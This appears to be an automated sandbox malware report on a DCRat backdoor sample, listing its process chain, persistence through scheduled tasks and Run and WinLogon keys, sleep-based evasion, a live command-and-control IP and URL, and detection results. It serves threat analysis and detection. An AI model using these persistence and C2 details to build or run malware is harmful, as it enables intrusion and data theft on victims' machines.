                Source: C:\Users\user\AppData\Local\staticfile.exe TID: 3288Thread sleep time: -595906s >= -30000s
                Source: C:\Users\user\AppData\Local\staticfile.exe TID: 3288Thread sleep time: -595797s >= -30000s
                Source: C:\Users\user\AppData\Local\staticfile.exe TID: 3288Thread sleep time: -595687s >= -30000s
                Source: C:\Users\user\AppData\Local\staticfile.exe TID: 3288Thread sleep time: -595578s >= -30000s
                Source: C:\Users\user\AppData\Local\staticfile.exe TID: 3288Thread sleep time: -595468s >= -30000s
                Source: C:\Users\user\AppData\Local\staticfile.exe TID: 3288Thread sleep time: -595359s >= -30000s
                Source: C:\Users\user\AppData\Local\staticfile.exe TID: 3288Thread sleep time: -595250s >= -30000s
                Source: C:\Users\user\AppData\Local\staticfile.exe TID: 3288Thread sleep time: -595140s >= -30000s
                Source: C:\Users\user\AppData\Local\staticfile.exe TID: 3288Thread sleep time: -595031s >= -30000s
                Source: C:\Users\user\AppData\Local\staticfile.exe TID: 3288Thread sleep time: -594921s >= -30000s
                Source: C:\Users\user\AppData\Local\staticfile.exe TID: 3288Thread sleep time: -594811s >= -30000s
                Source: C:\Users\user\AppData\Local\staticfile.exe TID: 3288Thread sleep time: -594703s >= -30000s
                Source: C:\Users\user\AppData\Local\staticfile.exe TID: 3288Thread sleep time: -594593s >= -30000s
                Source: C:\Users\user\AppData\Local\staticfile.exe TID: 3288Thread sleep time: -594484s >= -30000s
                Source: C:\Users\user\AppData\Local\staticfile.exe TID: 3288Thread sleep time: -594375s >= -30000s
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeFile Volume queried: C:\ FullSizeInformation
                Source: C:\Users\user\AppData\Local\staticfile.exeFile Volume queried: C:\ FullSizeInformation
                Source: C:\Users\user\AppData\Local\staticfile.exeFile Volume queried: C:\ FullSizeInformation
                Source: C:\Users\user\AppData\Local\staticfile.exeFile Volume queried: C:\ FullSizeInformation
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 30000
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 600000
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 599873
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 599763
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 599649
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 599484
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 599343
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 599203
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 599029
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 598921
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 598812
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 598703
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 598593
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 598484
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 598375
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 598265
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 598156
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 598047
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 3600000
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 597937
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 597828
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 597718
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 597609
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 597500
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 597390
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 597281
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 597172
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 597060
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 596947
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 596843
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 596716
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 596586
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 596472
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 596343
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 596234
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 596124
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 596015
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 595906
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 595797
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 595687
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 595578
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 595468
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 595359
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 595250
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 595140
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 595031
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 594921
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 594811
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 594703
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 594593
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 594484
                Source: C:\Users\user\AppData\Local\staticfile.exeThread delayed: delay time: 594375
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeFile opened: C:\Users\userJump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeFile opened: C:\Users\user\AppDataJump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: w32tm.exe, 00000010.00000002.2105141711.0000019D5AAD7000.00000004.00000020.00020000.00000000.sdmp, staticfile.exe, 00000016.00000002.3272954940.0000000000E4F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess information queried: ProcessInformation
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeMemory allocated: page read and write | page guardJump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\kdqn3ul3\kdqn3ul3.cmdline"Jump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sxun3xbz\sxun3xbz.cmdline"Jump to behavior
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\3tz3CUwFBN.bat" Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB12E.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSCFB5D2BE025D440B3B78FE4AD3E8F4E5B.TMP"Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB66E.tmp" "c:\Windows\System32\CSC97DCB281A28F42AF94908E122161F85F.TMP"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\staticfile.exe "C:\Users\user\AppData\Local\staticfile.exe" Jump to behavior
                Source: staticfile.exe, 00000016.00000002.3273686781.0000000002BDA000.00000004.00000800.00020000.00000000.sdmp, staticfile.exe, 00000016.00000002.3273686781.0000000002C3D000.00000004.00000800.00020000.00000000.sdmp, staticfile.exe, 00000016.00000002.3273686781.0000000002D73000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                Source: staticfile.exe, 00000016.00000002.3273686781.0000000002D73000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: known)","Unknown (Unknown)","Program Manager","8.46.123.189","US / United States","New York / New York","40.7123 / -74.0068"]
                Source: staticfile.exe, 00000016.00000002.3273686781.0000000002BDA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Managerx
                Source: staticfile.exe, 00000016.00000002.3273686781.0000000002D73000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: [{},"5.0.4",5,1,"","user","468325","Windows 10 Enterprise 64 Bit","N","Y","N","C:\\Users\\user\\AppData\\Local","Unknown (Unknown)","Unknown (Unknown)","Program Manager","8.46.123.189","US / United States","New York / New York","40.7123 / -74.0068"]
                Source: staticfile.exe, 00000016.00000002.3273686781.0000000002D73000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeQueries volume information: C:\Users\user\Desktop\ArELGBzuuF.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeQueries volume information: C:\Users\user\AppData\Local\staticfile.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeQueries volume information: C:\Users\user\AppData\Local\staticfile.exe VolumeInformationJump to behavior
                Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeQueries volume information: C:\Users\user\AppData\Local\staticfile.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\staticfile.exeQueries volume information: C:\Users\user\AppData\Local\staticfile.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\staticfile.exeQueries volume information: C:\Users\user\AppData\Local\staticfile.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\staticfile.exeQueries volume information: C:\Users\user\AppData\Local\staticfile.exe VolumeInformation
                Source: C:\Users\user\AppData\Local\staticfile.exeQueries volume information: C:\Users\user\AppData\Local\staticfile.exe VolumeInformation
                Source: C:\Users\user\Desktop\ArELGBzuuF.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected DCRat
                Source: Yara matchFile source: ArELGBzuuF.exe, type: SAMPLE
                Source: Yara matchFile source: 0.0.ArELGBzuuF.exe.580000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000000.2021098488.0000000000582000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000016.00000002.3273686781.0000000002D85000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: ArELGBzuuF.exe PID: 7032, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: staticfile.exe PID: 4820, type: MEMORYSTR
                Source: Yara matchFile source: C:\Users\user\AppData\Local\staticfile.exe, type: DROPPED

                Remote Access Functionality

                barindex
                Yara detected DCRat
                Source: Yara matchFile source: ArELGBzuuF.exe, type: SAMPLE
                Source: Yara matchFile source: 0.0.ArELGBzuuF.exe.580000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000000.2021098488.0000000000582000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000016.00000002.3273686781.0000000002D85000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: ArELGBzuuF.exe PID: 7032, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: staticfile.exe PID: 4820, type: MEMORYSTR
                Source: Yara matchFile source: C:\Users\user\AppData\Local\staticfile.exe, type: DROPPED

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information1
                Scripting                		Valid Accounts11
                Windows Management Instrumentation                		1
                Scheduled Task/Job                		12
                Process Injection                		22
                Masquerading                		OS Credential Dumping21
                Security Software Discovery                		1
                Taint Shared Content                		11
                Archive Collected Data                		1
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                Scheduled Task/Job                		1
                Scripting                		1
                Scheduled Task/Job                		1
                Disable or Modify Tools                		LSASS Memory2
                Process Discovery                		Remote Desktop ProtocolData from Removable Media1
                Non-Application Layer Protocol                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAt11
                Registry Run Keys / Startup Folder                		11
                Registry Run Keys / Startup Folder                		131
                Virtualization/Sandbox Evasion                		Security Account Manager131
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive11
                Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCron1
                DLL Side-Loading                		1
                DLL Side-Loading                		12
                Process Injection                		NTDS1
                Application Window Discovery                		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets2
                File and Directory Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
                Obfuscated Files or Information                		Cached Domain Credentials114
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                Software Packing                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                File Deletion                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 signatures2 2 Behavior Graph ID: 1581134 Sample: ArELGBzuuF.exe Startdate: 27/12/2024 Architecture: WINDOWS Score: 100 58 Suricata IDS alerts for network traffic 2->58 60 Found malware configuration 2->60 62 Antivirus detection for URL or domain 2->62 64 12 other signatures 2->64 7 ArELGBzuuF.exe 6 21 2->7         started        11 staticfile.exe 2 2->11         started        13 staticfile.exe 2->13         started        16 4 other processes 2->16 process3 dnsIp4 48 C:\Users\user\AppData\Local\staticfile.exe, PE32 7->48 dropped 50 C:\Users\...\staticfile.exe:Zone.Identifier, ASCII 7->50 dropped 52 C:\Users\user\AppData\...\kdqn3ul3.cmdline, Unicode 7->52 dropped 54 2 other malicious files 7->54 dropped 68 Creates an undocumented autostart registry key 7->68 70 Uses schtasks.exe or at.exe to add and modify task schedules 7->70 72 Creates processes via WMI 7->72 18 csc.exe 4 7->18         started        22 csc.exe 4 7->22         started        24 cmd.exe 1 7->24         started        26 3 other processes 7->26 74 Antivirus detection for dropped file 11->74 76 Multi AV Scanner detection for dropped file 11->76 78 Machine Learning detection for dropped file 11->78 80 Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines) 11->80 56 185.43.5.145, 49750, 49756, 49757 THEFIRST-ASRU Russian Federation 13->56 file5 signatures6 process7 file8 44 C:\Windows\...\SecurityHealthSystray.exe, PE32 18->44 dropped 66 Infects executable files (exe, dll, sys, html) 18->66 28 conhost.exe 18->28         started        30 cvtres.exe 1 18->30         started        46 C:\Program Files (x86)\...\msedge.exe, PE32 22->46 dropped 32 conhost.exe 22->32         started        34 cvtres.exe 1 22->34         started        36 staticfile.exe 2 24->36         started        38 w32tm.exe 1 24->38         started        40 conhost.exe 24->40         started        42 chcp.com 1 24->42         started        signatures9 process10

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                ArELGBzuuF.exe60%VirustotalBrowse
                ArELGBzuuF.exe79%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                ArELGBzuuF.exe100%AviraHEUR/AGEN.1309961
                ArELGBzuuF.exe100%Joe Sandbox ML

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\staticfile.exe100%AviraHEUR/AGEN.1309961
                C:\Users\user\AppData\Local\Temp\3tz3CUwFBN.bat100%AviraBAT/Delbat.C
                C:\Users\user\AppData\Local\staticfile.exe100%Joe Sandbox ML
                C:\Windows\System32\SecurityHealthSystray.exe100%Joe Sandbox ML
                C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\staticfile.exe79%ReversingLabsByteCode-MSIL.Backdoor.DCRat

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://185.43.5.145/ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/0%Avira URL Cloudsafe
                http://185.43.5.1450%Avira URL Cloudsafe
                http://185.43.5.145/ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.php100%Avira URL Cloudmalware

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.43.5.145/ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/UpdateGame/providerEternalpacketupdateBigloaddefaultbaselinux.phptrue
                • Avira URL Cloud: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://185.43.5.145/ServerUniversaluploadsDatalife/voiddb/cpupython/LocalDefaultsecureMariadb/Local/staticfile.exe, 00000016.00000002.3273686781.0000000002B99000.00000004.00000800.00020000.00000000.sdmp, staticfile.exe, 00000016.00000002.3273686781.0000000002BDA000.00000004.00000800.00020000.00000000.sdmp, staticfile.exe, 00000016.00000002.3273686781.0000000002C7C000.00000004.00000800.00020000.00000000.sdmp, staticfile.exe, 00000016.00000002.3273686781.0000000002C3D000.00000004.00000800.00020000.00000000.sdmp, staticfile.exe, 00000016.00000002.3273686781.0000000002D73000.00000004.00000800.00020000.00000000.sdmp, staticfile.exe, 00000016.00000002.3273686781.0000000002D85000.00000004.00000800.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                		unknown
                http://185.43.5.145staticfile.exe, 00000016.00000002.3273686781.0000000002D85000.00000004.00000800.00020000.00000000.sdmptrue
                • Avira URL Cloud: safe
                		unknown
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameArELGBzuuF.exe, 00000000.00000002.2053915585.0000000002B77000.00000004.00000800.00020000.00000000.sdmp, staticfile.exe, 00000016.00000002.3273686781.0000000002B99000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high

                  World Map of Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public IPs

                  IPDomainCountryFlagASNASN NameMalicious
                  185.43.5.145
                  		unknownRussian Federation
                  		29182THEFIRST-ASRUtrue

                  General Information

                  Joe Sandbox version:41.0.0 Charoite
                  Analysis ID:1581134
                  Start date and time:2024-12-27 04:01:05 +01:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 6m 22s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:24
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:ArELGBzuuF.exe
                  renamed because original name is a hash value
                  Original Sample Name:C410E5BDD0E37AB9D6B8EFC9B1B26B71.exe
                  Detection:MAL
                  Classification:mal100.spre.troj.expl.evad.winEXE@29/20@0/1
                  EGA Information:Failed
                  HCA Information:
                  • Successful, ratio: 93%
                  • Number of executed functions: 390
                  • Number of non-executed functions: 1
                  Cookbook Comments:
                  • Found application associated with file extension: .exe

                  Warnings

                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                  • Excluded IPs from analysis (whitelisted): 4.175.87.197, 13.107.246.63
                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                  • Execution Graph export aborted for target ArELGBzuuF.exe, PID 7032 because it is empty
                  • Execution Graph export aborted for target staticfile.exe, PID 2132 because it is empty
                  • Execution Graph export aborted for target staticfile.exe, PID 3136 because it is empty
                  • Execution Graph export aborted for target staticfile.exe, PID 3176 because it is empty
                  • Execution Graph export aborted for target staticfile.exe, PID 3724 because it is empty
                  • Execution Graph export aborted for target staticfile.exe, PID 4820 because it is empty
                  • Execution Graph export aborted for target staticfile.exe, PID 5068 because it is empty
                  • Execution Graph export aborted for target staticfile.exe, PID 5648 because it is empty
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size exceeded maximum capacity and may have missing disassembly code.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  04:01:54Task SchedulerRun new task: staticfile path: "C:\Users\user\AppData\Local\staticfile.exe"
                  04:01:54Task SchedulerRun new task: staticfiles path: "C:\Users\user\AppData\Local\staticfile.exe"
                  04:01:58AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run staticfile "C:\Users\user\AppData\Local\staticfile.exe"
                  04:02:06AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run staticfile "C:\Users\user\AppData\Local\staticfile.exe"
                  04:02:14AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run staticfile "C:\Users\user\AppData\Local\staticfile.exe"
                  04:02:36AutostartRun: WinLogon Shell "C:\Users\user\AppData\Local\staticfile.exe"
                  22:02:38API Interceptor12893x Sleep call for process: staticfile.exe modified

                  Joe Sandbox View / Context

                  IPs

                  No context

                  Domains

                  No context

                  ASNs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  THEFIRST-ASRUTodjHkXUZB.exeGet hashmaliciousDCRatBrowse
                  • 62.109.25.165
                  7fGdoA6Inq.exeGet hashmaliciousDCRatBrowse
                  • 78.24.221.196
                  Josho.spc.elfGet hashmaliciousUnknownBrowse
                  • 178.250.157.175
                  https://santa-secret.ru/api/verify?a=NjgyODEwNCw1bWluOHE2MHpuX3J1LC9hY2NvdW50L2JveGVzLHZsYWRpbWlyLmdsdXNoZW5rb0Bob2NobGFuZC5ydSwyNDE0MTYzMg==Get hashmaliciousUnknownBrowse
                  • 185.60.135.47
                  Dfim58cp4J.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                  • 188.120.227.56
                  KyC6hVwU8Z.exeGet hashmaliciousDCRatBrowse
                  • 185.43.5.93
                  gorkmTnChA.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                  • 185.246.67.73
                  home.mips.elfGet hashmaliciousGafgyt, MiraiBrowse
                  • 37.230.119.182
                  x86-20241130-2047.elfGet hashmaliciousMiraiBrowse
                  • 82.146.62.180
                  sora.mips.elfGet hashmaliciousMiraiBrowse
                  • 62.109.30.187

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  No context

                  Created / dropped Files

                  C:\Program Files (x86)\Microsoft\Edge\Application\CSCFB5D2BE025D440B3B78FE4AD3E8F4E5B.TMP

                  Download File
                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                  File Type:MSVC .res
                  Category:dropped
                  Size (bytes):1168
                  Entropy (8bit):4.448520842480604
                  Encrypted:false
                  SSDEEP:24:mZxT0uZhNB+h9PNnqNdt4+lEbNFjMyi07:yuulB+hnqTSfbNtme
                  MD5:B5189FB271BE514BEC128E0D0809C04E
                  SHA1:5DD625D27ED30FCA234EC097AD66F6C13A7EDCBE
                  SHA-256:E1984BA1E3FF8B071F7A320A6F1F18E1D5F4F337D31DC30D5BDFB021DF39060F
                  SHA-512:F0FCB8F97279579BEB59F58EA89527EE0D86A64C9DE28300F14460BEC6C32DDA72F0E6466573B6654A1E992421D6FE81AE7CCE50F27059F54CF9FDCA6953602E
                  Malicious:false
